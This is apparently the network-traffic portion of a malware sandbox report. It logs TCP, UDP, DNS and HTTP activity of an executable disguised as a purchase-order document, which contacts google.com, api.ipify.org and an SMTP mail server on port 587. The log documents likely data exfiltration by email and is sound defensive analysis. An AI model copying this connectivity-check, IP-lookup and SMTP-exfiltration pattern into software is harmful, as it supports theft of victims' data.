Jul 2, 2024 16:39:09.109251022 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109263897 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109277964 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109286070 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.109349966 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.109683990 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109697104 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109708071 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109744072 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.109761953 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.109903097 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109962940 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109973907 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.110012054 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.116036892 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.116085052 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.116166115 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.164786100 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:45.883554935 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:33.694600105 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:33.699575901 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:33.703977108 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:33.704265118 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:33.709098101 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369432926 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369458914 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369469881 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369523048 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369527102 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.369535923 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369548082 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369560003 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369577885 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.369597912 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.369735003 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369777918 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.369792938 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369805098 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.369851112 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.374361992 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.374402046 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.374419928 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.374454021 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.414891958 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.457667112 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.457771063 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.457782984 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.457813978 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.458254099 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.458297968 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.458317995 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.458329916 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.458359957 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.464256048 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.464320898 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.464330912 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.464366913 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.470391989 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.470439911 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.470443964 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.470455885 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.470503092 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.476370096 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.476385117 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.476407051 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.476439953 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.476459026 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.476511955 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.482419014 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.482450962 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.482461929 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.482491970 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.488444090 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.488462925 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.488495111 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.488589048 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.488631010 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.488701105 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.494440079 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.494455099 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.494482040 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.494518042 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.494528055 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.494560957 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.500536919 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.500569105 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.500581026 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.500600100 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.500627995 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.506462097 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.506494045 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.506509066 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.506534100 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.545874119 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.545924902 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.545923948 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.545936108 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.545989037 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.546061993 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.546127081 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.546138048 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.546159029 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.550359011 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.550407887 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.550431967 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.550442934 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.550455093 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.550493956 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.556262016 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.556298971 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.556308985 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.556340933 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.556376934 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.557550907 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.562314987 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.562370062 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.562378883 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.562428951 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.562438965 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.562462091 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.568335056 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.568375111 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:40:34.568392038 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:40:34.617990017 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:00.370852947 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:00.376362085 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:00.376463890 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:00.376938105 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:00.381768942 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047502995 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047563076 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047601938 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047662973 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.047683001 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047719955 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047754049 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047774076 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.047792912 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047807932 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.047828913 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047862053 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047897100 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.047898054 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.047946930 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.052807093 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.052877903 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.052910089 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.052943945 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.102457047 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.133960009 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.136341095 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.136369944 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.136503935 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.136970043 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.137044907 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.137058020 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.137101889 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.137101889 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.142952919 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.143049955 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.143060923 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.143071890 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.143100023 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.143234015 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.149132967 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.149418116 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.149430037 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.149548054 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.155165911 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.155221939 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.155224085 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.155235052 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.155710936 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.161309958 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.161369085 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.161381006 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.161443949 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.187203884 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187221050 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187350035 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187361956 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187374115 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187422037 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.187422037 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.187422037 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.187586069 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187665939 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187678099 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187756062 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.187787056 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.187939882 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.225209951 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.225235939 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.225246906 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.225392103 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.225444078 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.225456953 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.225547075 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.225594044 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.225594044 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.229748964 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.229773998 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.229784966 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.229806900 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.229896069 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.235908985 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.236038923 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.236051083 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.236378908 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.244400024 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.244427919 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.244440079 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.244508028 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.244508028 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:01.254745960 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.254776955 CEST	80	49730	142.250.74.196	192.168.2.6
Jul 2, 2024 16:41:01.254913092 CEST	49730	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:41:44.002779007 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:44.002883911 CEST	443	49731	104.26.12.205	192.168.2.6
Jul 2, 2024 16:41:44.002981901 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:44.041951895 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:44.041971922 CEST	443	49731	104.26.12.205	192.168.2.6
Jul 2, 2024 16:41:44.523844957 CEST	443	49731	104.26.12.205	192.168.2.6
Jul 2, 2024 16:41:44.524032116 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:44.526310921 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:44.526345015 CEST	443	49731	104.26.12.205	192.168.2.6
Jul 2, 2024 16:41:44.526782036 CEST	443	49731	104.26.12.205	192.168.2.6
Jul 2, 2024 16:41:44.571187973 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:44.632301092 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:44.672509909 CEST	443	49731	104.26.12.205	192.168.2.6
Jul 2, 2024 16:41:53.972701073 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:53.972846985 CEST	443	49731	104.26.12.205	192.168.2.6
Jul 2, 2024 16:41:53.972976923 CEST	49731	443	192.168.2.6	104.26.12.205
Jul 2, 2024 16:41:54.504041910 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:54.509613991 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:54.511722088 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:55.216917992 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.217344999 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:55.222189903 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.377623081 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.378021955 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:55.383440971 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.538207054 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.538845062 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:55.543876886 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.700376987 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.700396061 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.700407982 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.700474024 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.700474977 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:55.700491905 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.700546026 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:55.723404884 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:55.728251934 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.886351109 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:55.892951965 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:55.897854090 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.053464890 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.054642916 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.059586048 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.216249943 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.258723974 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.275254965 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.280076027 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.437946081 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.438287020 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.443109035 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.600809097 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.601164103 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.605933905 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.793632030 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.793930054 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.798711061 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.954091072 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.955044031 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.955080986 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.955100060 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.955135107 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:41:56.960074902 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.960088015 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.960539103 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:56.960550070 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:57.346035004 CEST	587	49732	198.54.122.135	192.168.2.6
Jul 2, 2024 16:41:57.399338961 CEST	49732	587	192.168.2.6	198.54.122.135
Jul 2, 2024 16:42:14.611192942 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:42:14.619270086 CEST	80	49728	142.250.74.196	192.168.2.6
Jul 2, 2024 16:42:14.619378090 CEST	49728	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:42:15.575212002 CEST	49730	80	192.168.2.6	142.250.74.196

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 16:39:08.193532944 CEST	60018	53	192.168.2.6	1.1.1.1
Jul 2, 2024 16:39:08.200876951 CEST	53	60018	1.1.1.1	192.168.2.6
Jul 2, 2024 16:41:43.987811089 CEST	59351	53	192.168.2.6	1.1.1.1
Jul 2, 2024 16:41:43.996845007 CEST	53	59351	1.1.1.1	192.168.2.6
Jul 2, 2024 16:41:54.495397091 CEST	60667	53	192.168.2.6	1.1.1.1
Jul 2, 2024 16:41:54.503184080 CEST	53	60667	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 16:39:08.193532944 CEST	192.168.2.6	1.1.1.1	0xdb8a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 16:41:43.987811089 CEST	192.168.2.6	1.1.1.1	0xfb36	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 2, 2024 16:41:54.495397091 CEST	192.168.2.6	1.1.1.1	0x787f	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 16:39:08.200876951 CEST	1.1.1.1	192.168.2.6	0xdb8a	No error (0)	www.google.com	142.250.74.196	A (IP address)	IN (0x0001)	false
Jul 2, 2024 16:41:43.996845007 CEST	1.1.1.1	192.168.2.6	0xfb36	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 2, 2024 16:41:43.996845007 CEST	1.1.1.1	192.168.2.6	0xfb36	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 2, 2024 16:41:43.996845007 CEST	1.1.1.1	192.168.2.6	0xfb36	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 2, 2024 16:41:54.503184080 CEST	1.1.1.1	192.168.2.6	0x787f	No error (0)	mail.privateemail.com	198.54.122.135	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

www.google.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	142.250.74.196	80	1372	C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 16:39:08.213855982 CEST	64	OUT	GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
Jul 2, 2024 16:39:08.915752888 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 14:39:08 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-dqUEiSDq4vXorRxG-n2yVQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AQTF6Hx_qfVnJyrjabAEuVJ7mRueFoAC99a9dxn0GOjaYZbQM2Fs4ylQAA; expires=Sun, 29-Dec-2024 14:39:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=515=YR9Tg5Fxk9gecoYEPUcUASsGyiiUMopx9QcjhzJnNOHIM2GZtADtJ8p5YCnfI3CA55v0nvL49_Wt_cW9v9lvbmpuD_mDynMzCMFNH5_yc4jBYn8M_Oif3RdTTT1hY_8F0-Gb91UagNDtKVIlOdh1iYmNhZ0TO6C4y5tugAUKGaQ; expires=Wed, 01-Jan-2025 14:39:08 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 35 31 65 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 